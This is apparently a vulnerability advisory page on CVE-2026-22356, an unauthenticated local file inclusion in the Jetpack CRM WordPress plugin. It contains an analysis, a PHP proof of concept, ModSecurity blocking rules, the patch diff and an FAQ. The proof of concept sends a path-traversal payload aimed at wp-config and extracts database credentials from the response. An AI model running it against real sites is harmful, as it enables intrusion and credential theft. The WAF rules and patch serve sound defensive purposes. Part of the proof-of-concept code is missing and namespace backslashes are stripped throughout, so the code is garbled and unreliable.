“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-22356:nThe Jetpack CRM plugin for WordPress contains an unauthenticated local file inclusion vulnerability in versions up to and including 6.7.0. This vulnerability allows attackers to include arbitrary PHP files from the server via path traversal in the `subtab` parameter, potentially leading to remote code execution. The vulnerability affects the MailPoet and WooSync module settings pages.nnRoot Cause:nThe vulnerability exists in the `jpcrm_load_admin_page` function within `zero-bs-crm/includes/ZeroBSCRM.AdminPages.php`. This function constructs file paths using unsanitized user input from the `subtab` parameter without proper path traversal validation. The vulnerable code at lines 30-35 concatenates `$alt_path . “admin/$page_name.page.php”` directly. Attackers can control `$page_name` through the `subtab` parameter in `zero-bs-crm/modules/mailpoet/admin/settings/router.page.php` and `zero-bs-crm/modules/woo-sync/admin/settings/router.page.php`. These router files pass user-controlled `$current_tab` values to the `load_admin_page` method without validating that the path stays within the intended directory.nnExploitation:nAttackers can exploit this vulnerability by sending GET requests to the WordPress admin-ajax.php endpoint or directly to the plugin’s admin pages with a malicious `subtab` parameter containing directory traversal sequences. A payload like `../../../../wp-config` would attempt to include the WordPress configuration file. The attack requires no authentication and can target endpoints that load the vulnerable router files, specifically the MailPoet and WooSync module settings pages where the `subtab` parameter is processed.nnPatch Analysis:nThe patch implements multiple security improvements. In `ZeroBSCRM.AdminPages.php`, the `jpcrm_load_admin_page` function now uses `realpath()` to resolve absolute paths and validates that the resolved file path begins with the expected base directory using `strpos($target_file, $base_dir) === 0`. The router files in the MailPoet and WooSync modules now hardcode the `$page` variable instead of reading it from `$_GET[‘tab’]`, and validate the `subtab` parameter with a regex pattern `/^[a-zA-Z0-9_-]+$/` that only allows alphanumeric characters, hyphens, and underscores. The patch also adds proper sanitization with `sanitize_text_field(wp_unslash($_GET[‘subtab’]))`.nnImpact:nSuccessful exploitation allows unauthenticated attackers to include and execute arbitrary PHP files from the server. This can lead to remote code execution, sensitive data exposure (including database credentials from wp-config.php), privilege escalation, and complete site compromise. The vulnerability bypasses WordPress access controls and can be chained with file upload capabilities to achieve persistent backdoor access.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-22356 – Jetpack CRM <= 6.7.0 – Unauthenticated Local File Inclusionnn<?phpn/**n * Proof of Concept for CVE-2026-22356n * Jetpack CRM Local File Inclusion Vulnerabilityn * n * This script demonstrates the unauthenticated LFI vulnerability in Jetpack CRM $action,n ‘subtab’ => $payload, // Malicious path traversal payloadn ‘nonce’ => ‘bypassed’ // Nonce may be required depending on configurationn];nncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);nn// Execute requestn$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);nn// Check for successful exploitation indicatorsnif ($http_code == 200) {n // Look for signs of successful file inclusionn if (strpos($response, ‘DB_NAME’) !== false || n strpos($response, ‘DB_PASSWORD’) !== false ||n strpos($response, ‘define(‘) !== false) {n echo “[+] SUCCESS: WordPress configuration file may have been included\n”;n echo “[+] Response contains database credentials or PHP define statements\n”;n n // Extract and display potential credentials (for demonstration only)n if (preg_match(‘/DB_NAME\s*,\s*[‘”]([^'”]+)[‘”]/’, $response, $matches)) {n echo “[+] Database Name: ” . $matches[1] . “\n”;n }n } else if (strpos($response, ‘Could not load the requested page’) === false) {n // The error message from the patched version is absentn echo “[+] LIKELY VULNERABLE: No ‘Could not load’ error message detected\n”;n echo “[+] Server response length: ” . strlen($response) . ” bytes\n”;n } else {n echo “[-] PATCHED: Received ‘Could not load’ error message\n”;n }n} else {n echo “[-] HTTP Error: ” . $http_code . “\n”;n}nn// Alternative direct endpoint test (if AJAX endpoint isn’t accessible)necho “\n[+] Testing direct module endpoint…\n”;nn// Test direct access to MailPoet settings pagen$direct_url = ‘http://vulnerable-site.com/wp-admin/admin.php?page=zerobscrm-settings&tab=mailpoet’;ncurl_setopt($ch, CURLOPT_URL, $direct_url);ncurl_setopt($ch, CURLOPT_POST, false);ncurl_setopt($ch, CURLOPT_HTTPGET, true);nn// Add subtab parameter to GET requestn$direct_url_with_payload = $direct_url . ‘&subtab=’ . urlencode($payload);ncurl_setopt($ch, CURLOPT_URL, $direct_url_with_payload);nn$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);nnif ($http_code == 200 && strpos($response, ‘Could not load the requested page’) === false) {n echo “[+] DIRECT ENDPOINT VULNERABLE: No error message on direct access\n”;n} else {n echo “[-] Direct endpoint may be patched or inaccessible\n”;n}nncurl_close($ch);n?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-22356n# Virtual patch for Jetpack CRM Local File Inclusion vulnerabilityn# Blocks exploitation via subtab parameter path traversalnnSecRule REQUEST_URI “@rx (/wp-admin/(admin-ajax\.php|admin\.php)|/index\.php/wp-admin/.*)” \n “id:202622356,phase:2,deny,status:403,chain,msg:’CVE-2026-22356 Jetpack CRM LFI via subtab parameter’,severity:’CRITICAL’,tag:’CVE-2026-22356′,tag:’WordPress’,tag:’Plugin/Jetpack-CRM’,tag:’attack-lfi'”n SecRule &ARGS_GET:subtab “@gt 0” \n “chain”n SecRule ARGS_GET:subtab “@rx (\.\.(/|%2f)|\x00|/etc/passwd|/wp-config|php://|expect://)” \n “t:none,t:urlDecode,t:htmlEntityDecode,t:lowercase”nn# Alternative rule for POST requests to admin-ajax.phpnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:202622357,phase:2,deny,status:403,chain,msg:’CVE-2026-22356 Jetpack CRM LFI via AJAX’,severity:’CRITICAL’,tag:’CVE-2026-22356′,tag:’WordPress’,tag:’Plugin/Jetpack-CRM’,tag:’attack-lfi'”n SecRule &ARGS_POST:subtab “@gt 0” \n “chain”n SecRule ARGS_POST:subtab “@rx (\.\.(/|%2f)|\x00|/etc/|c:\\)” \n “t:none,t:urlDecode,t:htmlEntityDecode,t:lowercase”nn# Block specific plugin admin pages that process the subtab parameternSecRule REQUEST_URI “@rx /wp-admin/admin\.php\?page=zerobscrm-settings&tab=(mailpoet|woosync)” \n “id:202622358,phase:2,deny,status:403,chain,msg:’CVE-2026-22356 Jetpack CRM LFI via settings page’,severity:’CRITICAL’,tag:’CVE-2026-22356′,tag:’WordPress’,tag:’Plugin/Jetpack-CRM’,tag:’attack-lfi'”n SecRule ARGS_GET:subtab “!@rx ^[a-zA-Z0-9_-]+$” \n “t:none,t:urlDecode””
}
“`
Published : March 18, 2026
CVE-2026-22356: Jetpack CRM <= 6.7.0 – Unauthenticated Local File Inclusion (zero-bs-crm)
CVE ID
CVE-2026-22356
Plugin
zero-bs-crm
Severity
High
(CVSS 8.1)
CWE
98
Vulnerable Version
6.7.0
Patched Version
6.7.1
Disclosed
February 15, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/zero-bs-crm/ZeroBSCRM.php
+++ b/zero-bs-crm/ZeroBSCRM.php
@@ -3,7 +3,7 @@
* Plugin Name: Jetpack CRM
* Plugin URI: https://jetpackcrm.com
* Description: Jetpack CRM is the simplest CRM for WordPress. Self host your own Customer Relationship Manager using WP.
- * Version: 6.7.0
+ * Version: 6.7.1
* Author: Automattic - Jetpack CRM team
* Author URI: https://jetpackcrm.com
* Text Domain: zero-bs-crm
--- a/zero-bs-crm/includes/ZeroBSCRM.AdminPages.php
+++ b/zero-bs-crm/includes/ZeroBSCRM.AdminPages.php
@@ -30,16 +30,21 @@
*/
function jpcrm_load_admin_page( $page_name, $alt_path = ZEROBSCRM_PATH ) {
- $target_file = $alt_path . "admin/$page_name.page.php";
+ $base_dir = realpath( $alt_path . 'admin' );
- if ( file_exists( $target_file ) ) {
+ if ( $base_dir === false ) {
+ echo wp_kses_post( zeroBSCRM_UI2_messageHTML( 'warning', '', __( 'Could not load the requested page.', 'zero-bs-crm' ) ) );
+ return;
+ }
- require_once $target_file;
+ $base_dir = rtrim( $base_dir, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
+ $target_file = realpath( "{$base_dir}{$page_name}.page.php" );
+ // Check if resolved path exists and stays within allowed base directory.
+ if ( $target_file !== false && strpos( $target_file, $base_dir ) === 0 ) {
+ require_once $target_file;
} else {
-
- echo zeroBSCRM_UI2_messageHTML( 'warning', '', __( 'Could not load the requested page.', 'zero-bs-crm' ) );
-
+ echo wp_kses_post( zeroBSCRM_UI2_messageHTML( 'warning', '', __( 'Could not load the requested page.', 'zero-bs-crm' ) ) );
}
}
--- a/zero-bs-crm/includes/ZeroBSCRM.Core.php
+++ b/zero-bs-crm/includes/ZeroBSCRM.Core.php
@@ -24,7 +24,7 @@
*
* @var string
*/
- const VERSION = '6.7.0';
+ const VERSION = '6.7.1';
/**
* Jetpack CRM version (used in various extensions as of January 2025).
--- a/zero-bs-crm/modules/mailpoet/admin/settings/router.page.php
+++ b/zero-bs-crm/modules/mailpoet/admin/settings/router.page.php
@@ -15,15 +15,20 @@
* Page: MailPoet Sync Settings
*/
function jpcrm_settings_page_html_mailpoet() {
-
+
global $zbs;
- $page = $_GET['tab'];
+ $page = 'mailpoet';
$current_tab = 'main';
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Navigation parameter, not data modification.
if ( isset( $_GET['subtab'] ) ) {
- $current_tab = sanitize_text_field ( $_GET['subtab'] );
+ $current_tab = sanitize_text_field( wp_unslash( $_GET['subtab'] ) ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+ // Only allow alphanumeric characters, hyphens, and underscores to prevent path traversal.
+ if ( ! preg_match( '/^[a-zA-Z0-9_-]+$/', $current_tab ) ) {
+ $current_tab = 'main';
+ }
}
- $zbs->modules->mailpoet->load_admin_page("settings/{$current_tab}");
- call_user_func( "AutomatticJetpackCRMjpcrm_settings_page_html_{$page}_{$current_tab}");
+ $zbs->modules->mailpoet->load_admin_page( "settings/{$current_tab}" );
+ call_user_func( "AutomatticJetpackCRMjpcrm_settings_page_html_{$page}_{$current_tab}" );
}
--- a/zero-bs-crm/modules/woo-sync/admin/settings/router.page.php
+++ b/zero-bs-crm/modules/woo-sync/admin/settings/router.page.php
@@ -15,17 +15,22 @@
* Page: WooSync Settings
*/
function jpcrm_settings_page_html_woosync() {
-
+
global $zbs;
- $page = $_GET['tab'];
+ $page = 'woosync';
$current_tab = 'main';
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Navigation parameter, not data modification.
if ( isset( $_GET['subtab'] ) ) {
- $current_tab = sanitize_text_field ( $_GET['subtab'] );
+ $current_tab = sanitize_text_field( wp_unslash( $_GET['subtab'] ) ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+ // Only allow alphanumeric characters, hyphens, and underscores to prevent path traversal.
+ if ( ! preg_match( '/^[a-zA-Z0-9_-]+$/', $current_tab ) ) {
+ $current_tab = 'main';
+ }
}
- $zbs->modules->woosync->load_admin_page("settings/{$current_tab}");
- call_user_func( "AutomatticJetpackCRMjpcrm_settings_page_html_{$page}_{$current_tab}");
+ $zbs->modules->woosync->load_admin_page( "settings/{$current_tab}" );
+ call_user_func( "AutomatticJetpackCRMjpcrm_settings_page_html_{$page}_{$current_tab}" );
// enqueue settings styles
if ( function_exists( 'AutomatticJetpackCRMjpcrm_woosync_connections_styles_scripts' ) ){
--- a/zero-bs-crm/vendor/autoload.php
+++ b/zero-bs-crm/vendor/autoload.php
@@ -19,4 +19,4 @@
require_once __DIR__ . '/composer/autoload_real.php';
-return ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::getLoader();
+return ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::getLoader();
--- a/zero-bs-crm/vendor/autoload_packages.php
+++ b/zero-bs-crm/vendor/autoload_packages.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/composer/autoload_real.php
+++ b/zero-bs-crm/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@
// autoload_real.php @generated by Composer
-class ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0
+class ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1
{
private static $loader;
@@ -24,17 +24,17 @@
require __DIR__ . '/platform_check.php';
- spl_autoload_register(array('ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0', 'loadClassLoader'), true, true);
+ spl_autoload_register(array('ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1', 'loadClassLoader'), true, true);
self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(__DIR__));
- spl_autoload_unregister(array('ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0', 'loadClassLoader'));
+ spl_autoload_unregister(array('ComposerAutoloaderInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1', 'loadClassLoader'));
require __DIR__ . '/autoload_static.php';
- call_user_func(ComposerAutoloadComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::getInitializer($loader));
+ call_user_func(ComposerAutoloadComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::getInitializer($loader));
$loader->setClassMapAuthoritative(true);
$loader->register(true);
- $filesToLoad = ComposerAutoloadComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::$files;
+ $filesToLoad = ComposerAutoloadComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::$files;
$requireFile = Closure::bind(static function ($fileIdentifier, $file) {
if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
$GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;
--- a/zero-bs-crm/vendor/composer/autoload_static.php
+++ b/zero-bs-crm/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@
namespace ComposerAutoload;
-class ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0
+class ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1
{
public static $files = array (
'3773ef3f09c37da5478d578e32b03a4b' => __DIR__ . '/../..' . '/jetpack_vendor/automattic/jetpack-assets/actions.php',
@@ -402,9 +402,9 @@
public static function getInitializer(ClassLoader $loader)
{
return Closure::bind(function () use ($loader) {
- $loader->prefixLengthsPsr4 = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::$prefixLengthsPsr4;
- $loader->prefixDirsPsr4 = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::$prefixDirsPsr4;
- $loader->classMap = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0::$classMap;
+ $loader->prefixLengthsPsr4 = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::$prefixLengthsPsr4;
+ $loader->prefixDirsPsr4 = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::$prefixDirsPsr4;
+ $loader->classMap = ComposerStaticInit06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1::$classMap;
}, null, ClassLoader::class);
}
--- a/zero-bs-crm/vendor/composer/installed.php
+++ b/zero-bs-crm/vendor/composer/installed.php
@@ -47,9 +47,9 @@
'dev_requirement' => false,
),
'automattic/jetpack-status' => array(
- 'pretty_version' => 'v6.1.1',
- 'version' => '6.1.1.0',
- 'reference' => '100acd2ad87f05b0782deac3905d52f9765725ce',
+ 'pretty_version' => 'v6.1.2',
+ 'version' => '6.1.2.0',
+ 'reference' => '1ccaefabcf9f609b2b55e07729ffcca1a749f485',
'type' => 'jetpack-library',
'install_path' => __DIR__ . '/../../jetpack_vendor/automattic/jetpack-status',
'aliases' => array(),
--- a/zero-bs-crm/vendor/composer/jetpack_autoload_classmap.php
+++ b/zero-bs-crm/vendor/composer/jetpack_autoload_classmap.php
@@ -467,43 +467,43 @@
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-constants/src/class-constants.php'
),
'Automattic\Jetpack\CookieState' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-cookiestate.php'
),
'Automattic\Jetpack\Errors' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-errors.php'
),
'Automattic\Jetpack\Files' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-files.php'
),
'Automattic\Jetpack\Modules' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-modules.php'
),
'Automattic\Jetpack\Paths' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-paths.php'
),
'Automattic\Jetpack\Status' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-status.php'
),
'Automattic\Jetpack\Status\Cache' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-cache.php'
),
'Automattic\Jetpack\Status\Host' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-host.php'
),
'Automattic\Jetpack\Status\Request' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-request.php'
),
'Automattic\Jetpack\Status\Visitor' => array(
- 'version' => '6.1.1.0',
+ 'version' => '6.1.2.0',
'path' => $baseDir . '/jetpack_vendor/automattic/jetpack-status/src/class-visitor.php'
),
'Automattic\WooCommerce\Client' => array(
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader-handler.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader-handler.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader-locator.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader-locator.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-autoloader.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-container.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-container.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-hook-manager.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-hook-manager.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-latest-autoloader-guard.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-latest-autoloader-guard.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-manifest-reader.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-manifest-reader.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-path-processor.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-path-processor.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-php-autoloader.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-php-autoloader.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-plugin-locator.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-plugin-locator.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-plugins-handler.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-plugins-handler.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-shutdown-handler.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-shutdown-handler.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-version-loader.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-version-loader.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
--- a/zero-bs-crm/vendor/jetpack-autoloader/class-version-selector.php
+++ b/zero-bs-crm/vendor/jetpack-autoloader/class-version-selector.php
@@ -5,7 +5,7 @@
* @package automattic/jetpack-autoloader
*/
-namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_0al5_0_13;
+namespace AutomatticJetpackAutoloaderjp06c775433a83ed276f0a1d8ac25f93ba_crmⓥ6_7_1al5_0_13;
// phpcs:ignore
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
Frequently Asked Questions
What is CVE-2026-22356?
Overview of the vulnerabilityCVE-2026-22356 is a high-severity vulnerability in the Jetpack CRM plugin for WordPress, specifically versions up to and including 6.7.0. It allows unauthenticated attackers to exploit a Local File Inclusion (LFI) vulnerability, enabling them to include and execute arbitrary files on the server.
How does the vulnerability work?
Mechanism of exploitationThe vulnerability arises from unsanitized user input in the ‘subtab’ parameter, which allows attackers to perform path traversal. By manipulating this parameter, an attacker can include sensitive files, such as the WordPress configuration file, leading to potential remote code execution.
Who is affected by this vulnerability?
Identifying vulnerable installationsAny WordPress site using the Jetpack CRM plugin version 6.7.0 or earlier is at risk. Administrators should check their plugin version and update if necessary to mitigate the vulnerability.
How can I check if my site is vulnerable?
Version verificationTo determine if your site is vulnerable, check the version of the Jetpack CRM plugin installed. If it is version 6.7.0 or earlier, your site is vulnerable and should be updated immediately.
What steps should I take to fix this vulnerability?
Updating the pluginThe vulnerability has been patched in version 6.7.1 of the Jetpack CRM plugin. Administrators should update to this version or later to ensure protection against the vulnerability.
What does the CVSS score of 8.1 indicate?
Understanding severity levelsA CVSS score of 8.1 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. This level of risk means that exploitation could lead to serious consequences, including unauthorized access and data exposure.
What practical risks does this vulnerability pose?
Potential impacts of exploitationExploitation of this vulnerability can lead to remote code execution, allowing attackers to execute arbitrary PHP code on the server. This could result in data breaches, site compromise, and unauthorized access to sensitive information.
How does the proof of concept demonstrate the vulnerability?
Understanding the provided PoCThe proof of concept (PoC) illustrates how an attacker can exploit the vulnerability by sending crafted requests to the vulnerable endpoints. It shows how to include sensitive files and checks for successful exploitation by looking for database credentials in the response.
What are the recommended mitigation strategies?
Preventive measuresIn addition to updating the plugin, administrators should implement web application firewalls (WAFs) to block malicious requests. Regular security audits and monitoring for unusual activity can also help mitigate risks.
Are there any additional security measures to consider?
Enhancing overall securityBeyond patching this specific vulnerability, site administrators should ensure that all plugins and themes are regularly updated, implement strong access controls, and consider using security plugins that offer additional layers of protection.
What if I cannot update the plugin immediately?
Temporary workaroundsIf immediate updating is not possible, consider disabling the Jetpack CRM plugin until a safe update can be performed. Additionally, implementing a WAF rule to block requests that exploit this vulnerability can provide temporary protection.
Where can I find more information about this vulnerability?
Resources for further readingDetailed information about CVE-2026-22356 can be found on the official CVE database, security advisories from Jetpack CRM, and various cybersecurity blogs that analyze vulnerabilities in WordPress plugins.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
